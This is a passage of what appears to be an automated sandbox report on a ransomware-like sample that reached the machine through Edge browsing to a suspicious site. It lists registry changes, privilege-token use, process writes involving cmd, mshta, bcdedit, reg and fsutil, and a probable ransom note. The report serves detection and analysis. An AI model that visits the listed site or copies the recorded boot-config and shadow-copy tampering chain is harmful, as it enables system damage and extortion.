Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{84120007-AAEF-4793-8BD5-2E8E8A26350B} msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_AESCrypt_v310_x64.zip\\AESCrypt_v310_x64\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.aes\aesfile\ShellNew msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\SourceList\PackageName = "AESCrypt.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.aes msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\DefaultIcon msiexec.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\shell\open\command\command = 55006300680063004300650054007400370039003800780045002c006200740065003700670072003e007e004700450056003d00650048007d00660045003400500059004000500077006f00440077007a002000220025003100220000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\DefaultIcon\ = "C:\\Windows\\Installer\\{562885D3-41A7-4211-822E-B1B1510069E5}\\_853F67D554F05449430E7E.exe,0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\ = "AESCryptShellExtCom Class" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\InprocServer32 MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\AESCrypt\ = "{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}" MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\shell msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\AESCrypt.DLL\AppID = "{BACE464C-A450-46A7-BC98-F441BCE45CE9}" MsiExec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\shell\ = "open" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\ProductIcon = "C:\\Windows\\Installer\\{562885D3-41A7-4211-822E-B1B1510069E5}\\_112D608FD02CD87FDC7735.exe" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\06E61D2961F138147AC880C670FC34A6\3D5882657A14112428E21B1B1500965E msiexec.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\shell\open\command\ = "\"C:\\Program Files\\AESCrypt\\AESCrypt32.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D5882657A14112428E21B1B1500965E msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\06E61D2961F138147AC880C670FC34A6 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\AppID = "{BACE464C-A450-46A7-BC98-F441BCE45CE9}" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\ProductName = "AES Crypt" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\AESCrypt MsiExec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\SourceList\Media msiexec.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Opens file in notepad (likely ransom note) 5 IoCs
Processes:
NOTEPAD.EXENOTEPAD.EXEpid process 3532 5032 1960 NOTEPAD.EXE 1200 NOTEPAD.EXE 1892 -
Runs net.exe
-
Runs ping.exe 1 TTPs 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msiexec.exepowershell.exepowershell.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exepid process 5000 msiexec.exe 5000 msiexec.exe 2080 powershell.exe 2080 powershell.exe 2080 powershell.exe 2292 powershell.exe 2292 powershell.exe 2292 powershell.exe 868 System.exe 868 System.exe 868 System.exe 868 System.exe 5704 System.exe 5704 System.exe 5704 System.exe 5704 System.exe 212 System.exe 212 System.exe 212 System.exe 212 System.exe 4316 System.exe 4316 System.exe 4316 System.exe 4316 System.exe 3292 System.exe 3292 System.exe 3292 System.exe 3292 System.exe 3692 System.exe 3692 System.exe 3692 System.exe 3692 System.exe 4100 System.exe 4100 System.exe 4100 System.exe 4100 System.exe 5020 System.exe 5020 System.exe 5020 System.exe 5020 System.exe 1892 System.exe 1892 System.exe 1892 System.exe 1892 System.exe 6136 System.exe 6136 System.exe 6136 System.exe 6136 System.exe 5000 System.exe 5000 System.exe 5000 System.exe 5000 System.exe 1168 System.exe 1168 System.exe 1168 System.exe 1168 System.exe 3916 System.exe 3916 System.exe 3916 System.exe 3916 System.exe 4924 System.exe 4924 System.exe 4924 System.exe 4924 System.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 5324 msiexec.exe Token: SeIncreaseQuotaPrivilege 5324 msiexec.exe Token: SeSecurityPrivilege 5000 msiexec.exe Token: SeCreateTokenPrivilege 5324 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 5324 msiexec.exe Token: SeLockMemoryPrivilege 5324 msiexec.exe Token: SeIncreaseQuotaPrivilege 5324 msiexec.exe Token: SeMachineAccountPrivilege 5324 msiexec.exe Token: SeTcbPrivilege 5324 msiexec.exe Token: SeSecurityPrivilege 5324 msiexec.exe Token: SeTakeOwnershipPrivilege 5324 msiexec.exe Token: SeLoadDriverPrivilege 5324 msiexec.exe Token: SeSystemProfilePrivilege 5324 msiexec.exe Token: SeSystemtimePrivilege 5324 msiexec.exe Token: SeProfSingleProcessPrivilege 5324 msiexec.exe Token: SeIncBasePriorityPrivilege 5324 msiexec.exe Token: SeCreatePagefilePrivilege 5324 msiexec.exe Token: SeCreatePermanentPrivilege 5324 msiexec.exe Token: SeBackupPrivilege 5324 msiexec.exe Token: SeRestorePrivilege 5324 msiexec.exe Token: SeShutdownPrivilege 5324 msiexec.exe Token: SeDebugPrivilege 5324 msiexec.exe Token: SeAuditPrivilege 5324 msiexec.exe Token: SeSystemEnvironmentPrivilege 5324 msiexec.exe Token: SeChangeNotifyPrivilege 5324 msiexec.exe Token: SeRemoteShutdownPrivilege 5324 msiexec.exe Token: SeUndockPrivilege 5324 msiexec.exe Token: SeSyncAgentPrivilege 5324 msiexec.exe Token: SeEnableDelegationPrivilege 5324 msiexec.exe Token: SeManageVolumePrivilege 5324 msiexec.exe Token: SeImpersonatePrivilege 5324 msiexec.exe Token: SeCreateGlobalPrivilege 5324 msiexec.exe Token: SeCreateTokenPrivilege 5324 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 5324 msiexec.exe Token: SeLockMemoryPrivilege 5324 msiexec.exe Token: SeIncreaseQuotaPrivilege 5324 msiexec.exe Token: SeMachineAccountPrivilege 5324 msiexec.exe Token: SeTcbPrivilege 5324 msiexec.exe Token: SeSecurityPrivilege 5324 msiexec.exe Token: SeTakeOwnershipPrivilege 5324 msiexec.exe Token: SeLoadDriverPrivilege 5324 msiexec.exe Token: SeSystemProfilePrivilege 5324 msiexec.exe Token: SeSystemtimePrivilege 5324 msiexec.exe Token: SeProfSingleProcessPrivilege 5324 msiexec.exe Token: SeIncBasePriorityPrivilege 5324 msiexec.exe Token: SeCreatePagefilePrivilege 5324 msiexec.exe Token: SeCreatePermanentPrivilege 5324 msiexec.exe Token: SeBackupPrivilege 5324 msiexec.exe Token: SeRestorePrivilege 5324 msiexec.exe Token: SeShutdownPrivilege 5324 msiexec.exe Token: SeDebugPrivilege 5324 msiexec.exe Token: SeAuditPrivilege 5324 msiexec.exe Token: SeSystemEnvironmentPrivilege 5324 msiexec.exe Token: SeChangeNotifyPrivilege 5324 msiexec.exe Token: SeRemoteShutdownPrivilege 5324 msiexec.exe Token: SeUndockPrivilege 5324 msiexec.exe Token: SeSyncAgentPrivilege 5324 msiexec.exe Token: SeEnableDelegationPrivilege 5324 msiexec.exe Token: SeManageVolumePrivilege 5324 msiexec.exe Token: SeImpersonatePrivilege 5324 msiexec.exe Token: SeCreateGlobalPrivilege 5324 msiexec.exe Token: SeCreateTokenPrivilege 5324 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 5324 msiexec.exe Token: SeLockMemoryPrivilege 5324 msiexec.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msiexec.exepid process 5324 msiexec.exe 5324 msiexec.exe 5324 msiexec.exe 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
pid process 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 4632 -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
pid process 3116 392 5176 6116 400 1344 5172 3904 5188 5292 2108 5292 5188 3904 2108 3904 5292 5188 2108 5292 5188 3904 2108 3904 5188 5292 2108 5188 5292 3904 2108 3904 5188 5292 2108 5292 3904 5188 2108 3904 5188 5292 2108 5292 5188 3904 2108 5188 5292 3904 2108 5292 5188 3904 2108 3904 5188 5292 2108 5292 5188 3904 2108 3904 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msiexec.exesvchost.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeWScript.execmd.exedescription pid process target process PID 5000 wrote to memory of 4948 5000 msiexec.exe MsiExec.exe PID 5000 wrote to memory of 4948 5000 msiexec.exe MsiExec.exe PID 5000 wrote to memory of 4948 5000 msiexec.exe MsiExec.exe PID 5000 wrote to memory of 4668 5000 msiexec.exe srtasks.exe PID 5000 wrote to memory of 4668 5000 msiexec.exe srtasks.exe PID 5000 wrote to memory of 6044 5000 msiexec.exe MsiExec.exe PID 5000 wrote to memory of 6044 5000 msiexec.exe MsiExec.exe PID 5000 wrote to memory of 6044 5000 msiexec.exe MsiExec.exe PID 5000 wrote to memory of 5560 5000 msiexec.exe MsiExec.exe PID 5000 wrote to memory of 5560 5000 msiexec.exe MsiExec.exe PID 1556 wrote to memory of 4572 1556 svchost.exe dashost.exe PID 1556 wrote to memory of 4572 1556 svchost.exe dashost.exe PID 3648 wrote to memory of 2924 3648 cmd.exe mode.com PID 3648 wrote to memory of 2924 3648 cmd.exe mode.com PID 3648 wrote to memory of 2928 3648 cmd.exe cmd.exe PID 3648 wrote to memory of 2928 3648 cmd.exe cmd.exe PID 2928 wrote to memory of 4196 2928 cmd.exe mshta.exe PID 2928 wrote to memory of 4196 2928 cmd.exe mshta.exe PID 3116 wrote to memory of 116 3116 cmd.exe cmd.exe PID 3116 wrote to memory of 116 3116 cmd.exe cmd.exe PID 116 wrote to memory of 4456 116 cmd.exe cmd.exe PID 116 wrote to memory of 4456 116 cmd.exe cmd.exe PID 5968 wrote to memory of 1540 5968 cmd.exe cmd.exe PID 5968 wrote to memory of 1540 5968 cmd.exe cmd.exe PID 1540 wrote to memory of 3152 1540 cmd.exe cmd.exe PID 1540 wrote to memory of 3152 1540 cmd.exe cmd.exe PID 5124 wrote to memory of 1676 5124 cmd.exe chcp.com PID 5124 wrote to memory of 1676 5124 cmd.exe chcp.com PID 5124 wrote to memory of 5588 5124 cmd.exe fsutil.exe PID 5124 wrote to memory of 5588 5124 cmd.exe fsutil.exe PID 5124 wrote to memory of 1116 5124 cmd.exe WScript.exe PID 5124 wrote to memory of 1116 5124 cmd.exe WScript.exe PID 1116 wrote to memory of 6124 1116 WScript.exe cmd.exe PID 1116 wrote to memory of 6124 1116 WScript.exe cmd.exe PID 6124 wrote to memory of 3916 6124 cmd.exe chcp.com PID 6124 wrote to memory of 3916 6124 cmd.exe chcp.com PID 6124 wrote to memory of 4460 6124 cmd.exe fsutil.exe PID 6124 wrote to memory of 4460 6124 cmd.exe fsutil.exe PID 6124 wrote to memory of 4552 6124 cmd.exe msg.exe PID 6124 wrote to memory of 4552 6124 cmd.exe msg.exe PID 6124 wrote to memory of 4520 6124 cmd.exe cmd.exe PID 6124 wrote to memory of 4520 6124 cmd.exe cmd.exe PID 6124 wrote to memory of 6100 6124 cmd.exe attrib.exe PID 6124 wrote to memory of 6100 6124 cmd.exe attrib.exe PID 6124 wrote to memory of 3888 6124 cmd.exe bcdedit.exe PID 6124 wrote to memory of 3888 6124 cmd.exe bcdedit.exe PID 6124 wrote to memory of 3260 6124 cmd.exe bcdedit.exe PID 6124 wrote to memory of 3260 6124 cmd.exe bcdedit.exe PID 6124 wrote to memory of 2284 6124 cmd.exe reg.exe PID 6124 wrote to memory of 2284 6124 cmd.exe reg.exe PID 6124 wrote to memory of 3472 6124 cmd.exe reg.exe PID 6124 wrote to memory of 3472 6124 cmd.exe reg.exe PID 6124 wrote to memory of 2080 6124 cmd.exe reg.exe PID 6124 wrote to memory of 2080 6124 cmd.exe reg.exe PID 6124 wrote to memory of 1856 6124 cmd.exe reg.exe PID 6124 wrote to memory of 1856 6124 cmd.exe reg.exe PID 6124 wrote to memory of 4744 6124 cmd.exe reg.exe PID 6124 wrote to memory of 4744 6124 cmd.exe reg.exe PID 6124 wrote to memory of 3076 6124 cmd.exe reg.exe PID 6124 wrote to memory of 3076 6124 cmd.exe reg.exe PID 6124 wrote to memory of 3584 6124 cmd.exe reg.exe PID 6124 wrote to memory of 3584 6124 cmd.exe reg.exe PID 6124 wrote to memory of 2396 6124 cmd.exe reg.exe PID 6124 wrote to memory of 2396 6124 cmd.exe reg.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 64 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 5968 attrib.exe 6112 attrib.exe 5052 1612 628 2076 1444 attrib.exe 392 5360 5868 3708 3152 3292 628 attrib.exe 5128 5004 1940 4480 5392 4480 4520 attrib.exe 4524 attrib.exe 448 attrib.exe 1176 attrib.exe 1596 3688 5224 684 6120 4460 5976 5420 1648 4944 4956 3256 6084 attrib.exe 5676 attrib.exe 2960 5220 3548 1912 2020 4256 6124 1760 5568 4700 5976 4524 5828 attrib.exe 4524 attrib.exe 5128 1200 1292 4944 3540 4600 2800 5568 attrib.exe 4296 attrib.exe 3256 5836 6040 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://wisegex.com1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --field-trial-handle=4044,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=3772 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --field-trial-handle=1756,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=4812 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --field-trial-handle=5020,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5240 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5256,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5400 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5404,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5484 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=5024,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5956 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=5116,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5936 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=6076,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6124 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=6276,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5444 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --field-trial-handle=5936,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=5420 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6088,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6760 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=6280,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6924 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --field-trial-handle=6944,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6788 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=6492,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6408 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6272,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6324 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --field-trial-handle=6356,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6316,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7140 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6336,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6312 /prefetch:81⤵
- Modifies registry class
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --field-trial-handle=6304,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7416 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --field-trial-handle=7508,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7520 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --field-trial-handle=7704,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7672 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --field-trial-handle=6484,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6460 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --field-trial-handle=6508,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --field-trial-handle=7220,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=7936 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --field-trial-handle=7836,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8140 /prefetch:11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=8384,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8516 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=8716,i,16710585221322798697,8586257254049248207,262144 --variations-seed-version --mojo-platform-channel-handle=8728 /prefetch:81⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
